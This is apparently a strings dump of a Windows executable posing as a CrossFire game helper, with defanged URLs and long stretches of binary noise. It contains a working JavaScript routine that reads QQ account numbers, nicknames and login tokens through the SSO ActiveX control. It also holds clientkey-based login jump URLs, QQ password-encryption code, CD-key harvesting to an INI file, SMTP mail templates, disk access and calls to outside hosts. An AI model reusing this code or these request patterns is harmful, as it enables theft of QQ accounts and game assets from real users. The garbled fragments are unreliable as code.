var saltPwd = s.TEA.enAsBase64(rsaH1Len   rsaH1   s.TEA.strToBytes(salt)   vcodeLen   hexVcode);
s.TEA.initkey('');
&appid=21000124&js_ver=10151&js_type=1&login_sig=XJ3RXmdJfvKA-*hz7TXwNTq902uwplhW6tRdiEFDhxMVRhi1bDCo0QdXVBbNxAfN&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&r=
function time(){return Math.random()}
hXXp://captcha.qq.com/cap_union_getsig_new?clientype=2&uin=
hXXp://captcha.qq.com/getimgbysig?clientype=2&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
&keyindex=9&pt_aid=21000124&daid=8&u1=http://cf.qq.com/comm-htdocs/login/logincallback.htm&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
&keyindex=9&pt_aid=15000103&daid=5&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&clientkey=
.PaH 
U]X%xw
O.vMk$
s.>.vc
%X~ -
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
,"iRet":"0","sMsg":"
modRet":{"iRet":"0","sMsg":"
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=page=6
hXXp://bbs.cf.qq.com/forum.php?mod=viewthread&tid=
99998888
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
sMsg":"
bHasSendFailItem":"0","iRet":"0","sMsg":"
hXXp://apps.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=79968&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams2.02.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/jsonp.php?_c=page&actid=5474&isLoadUserInfo=1&callback=page.signInCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://share.music.qq.com/fcgi-bin/dmrp_activity/fcg_feedback_send_lottery.fcg?activeid=110&rnd=1458872103167&g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
hXXp://vip.qzone.qq.com/fcg-bin/v2/fcg_mobile_vip_site_checkin?t=0.46869834180487055&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
&collect=yehFdbVCaf6iRVmDtqzeLJS11vU2naOwqvdxlLqGgQgGJ4_1_XDmcUqe-XbQfHy6_zKOfL_dTnSV5_S5FuHtVYE2M64qMUdEQwAofTHRuzp5HPhYJuWiJRwtmyS8dEllMsGR5MxIy6kK3cCNw9aOvyKUaV8xygen57rNX0BAzkOOtzxtXLSOnSV6prBECoE5JCuV_pDIt_Hl6Vy4fWiQrRmAoS2Dud5MMasCnWCHonOwKhub5TaOuEpjfoEAF2ResP3i32BFRog1PO8WIxl4D__-61X3q-C4RD3jR5GbftwSIPPU8chK9rrwr5I3XW-yGYyNLKKfSvRl4CIRSmenCQw9MdOLMBA-Kq3wA-Isq5nFFis-2uJm8OdDb0rcVGZZM8lF5eN_dSLgHOFx-kGUSWkuLYx9QHR-_3K4B4wu907rpbKeobTewmLGw6-az0VkyJSlwRdFjciqcUFPdpy3kuIDdh9P6JnGiMb16ADzfjA8KdwuUZaXG40CKTsTX6L-kjN-f2iYbkyQP1NS8oaBXXCCGHHToXvb8lGeiMud00_wtNjKywve0slKxZhcDZlcNcagw0WtCD8ckxCANdo2WinaIWzyApgf1gMl_pRAtgsH1PMmglKLLnmoZo86HGTPDAoyMzzQF5MMdTJ2LYKwxSK2swj4yeKX3jPZHOuYt74*&ans=
hXXp://captcha.qq.com/cap_union_verify_new?clientype=2&uin=
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=48025&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=45566&sServiceDepartment=group_f
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
&e_code=0&g_code=0&eas_url=http://daoju.qq.com/mall/judou2.0/cf.shtml&sServiceDepartment=djc&sPartition=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.6722960381302983
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=42715&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
.text
`.data
@.reloc
KERNEL32.dll
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 00:00:00
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
{D30C1661-CDAF-11d0-8A3E-00C04FC9E26E}
document.all.resultjs.innerText=
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
msscript.ocx
VVV.dywt.com.cn
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetCPInfo
WinExec
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetKeyState
GetKeyboardState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
KeyA
UrlA3
#include "l.chs\afxres.rc" // Standard components
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.CNNNB
.CNNd
ÝDDDDDDQC
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD
oledlg.dll
RASAPI32.dll
WININET.dll
1.0.15.507
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
(*.*)
2.4.9.0
hXXp://VVV.cfzhushou.com

%original file name%.exe_2712_rwx_00401000_0045F000:

th.Ux
yh.Ux
wh.Ux
xh.Ux
qh.Ux
t$(SSh
~%UVW
u$SShe
Jiu2.iu
K(.wS
gdiplus.dll
user32.dll
kernel32.dll
ntdll.dll
Kernel32.dll
GdiPlus.dll
wininet.dll
ole32.dll
ws2_32.dll
User32.dll
shell32.dll
Ole32.dll
OleAut32.dll
CF_Updata.dll
atl.dll
gzip.dll
urlmon
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
GetProcessHeap
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
ShellExecuteA
42305932-06E6-47a5-AC79-8BDCDC58DF61
WebBrowser
?kernel32.dll
hXXp://apps.game.qq.com/CommArticle/app/reg/gdate.php
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
JOIN
CONFIG.SYS
DosExecPgm
Windows
1613-Windows
WindowsServicePark
1615-SQL
1631-Windows
1637-Windows
WindowsServicePack
1642-Windows
WindowsRPC
Windows2000
CommPort
NET.ACC
LANMAN\NETPROG\ADDPAK.SER
CACHE.EXE
WindowsNT
3108-NETWKSTA.SYS
CLANROOT\LOGS\FT.LOG
LAMAN.INI
3404-LAMAN.INI
NETWKSTA.SYS
3804-SCHED.LOG
3901-****
3902-****
4454-WindowsNT
4470-Windows2000
4486-WindowsNT
4488-WindowsNTServer
4696-WindowsNTServer
4697-WindowsNTWorkstation
5295-NETUS.HLP
5296-NET.HLP
5509-Windows2000
RPLDISK.SYS
$SystemRootSystem32Configetlogon.dns$
MODEM.INF
schema.ini
2.5.5.1
2.5.5.7
2.5.5.14
9851-TCP/IP
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
<!-- "@"
<!-- "@":1.
<!-- "#":
<Method Index="6" Name="crText" Type="@3#"/>
<Method Index="5" Name="crText" Type="@3#"/>
<Method Index="45" Name="PasswordChar" Type="@11#"/>
<Method Index="53" Name="crText" Type="@3#"/>
<Method Index="54" Name="crTextSel" Type="@3#"/>
<Method Index="14" Name="crText" Type="@3#"/>
T.ZQ2
CDKEY
CDKEY:
dC.Fq
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
%4u3\2t
W.ctn
ei_E1%d
(NS[wÙ
e-.Tz
, #&')*)
-0-(0%()(
k.fb2
9%fWS2
9h.oc
".aBp
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
%f%%f
7".Fv
>.OsM
r.vDO
V2.4.9
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://note.youdao.com/yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public
hXXp://leesin1.zichaob.com/cf.txt
\CF_Updata.dll
.yP[=
%XX7.
i.dhG
'ASho%x
,%u9]
w5\pUWSSHh
$%FNHfI
.htbW
.Be$>;
<30.vj
.OXWh0T
AR,O%U
0FtPo
R.NL3
.QTC0
z=Q%c`H
%u5.]X
.PTJ2T
WudP
ab.Lkl%
%&'%u
dB.pn*
l0y.WD
.tCDHP
.dHu`
WV4o.Ct
EU%X_
0K.WN40
.UGP$Kr
WaM@{.wB_
<.&%C
X%C@ X
.hZM:
l%uBGX
,<C.kwFt
ininet.dll
33.cos.myq
m/1.txt
<Mozilla/4.0 (f
form-urlF
7.P|.Nr
0ZR.BI@/DE0,
O.OPP
%d&&'
 *)(''&%$$#""!!
?%*.*f
_CmdT"
.INI.HL^$=
R.MSVCRTerhC
9y.xX
9y.Phh
X%Sm'
.PAVG
(&07-034/)7
)*$-2{  
%s:%d/]
6]| 0 '.
Eh.dE7
keyw
E:\e5\
%SOCK
29\TCP"d7
qCONT.WlB
f2pn-t|/tcp;
.dyw(/cn.dx
zcÁ
Ug>Key
< 3)20,6
=.tex
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
COMCTL32.dll
comdlg32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
RegCloseKey
2.dll
.jF<J
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
666666666
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
szNick_name=
news.exe
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
&e_code=0&g_code=0&eas_url=http://xinyue.qq.com/act/pc/shenhanghezuoPC/&sServiceDepartment=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=40568&sServiceDepartment=xinyue&set_info=xinyue
cdkeylist":"
119.29.144.30
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
' ': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   '\n';
return t   aC.substring(z, aC.length)
return '0'   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
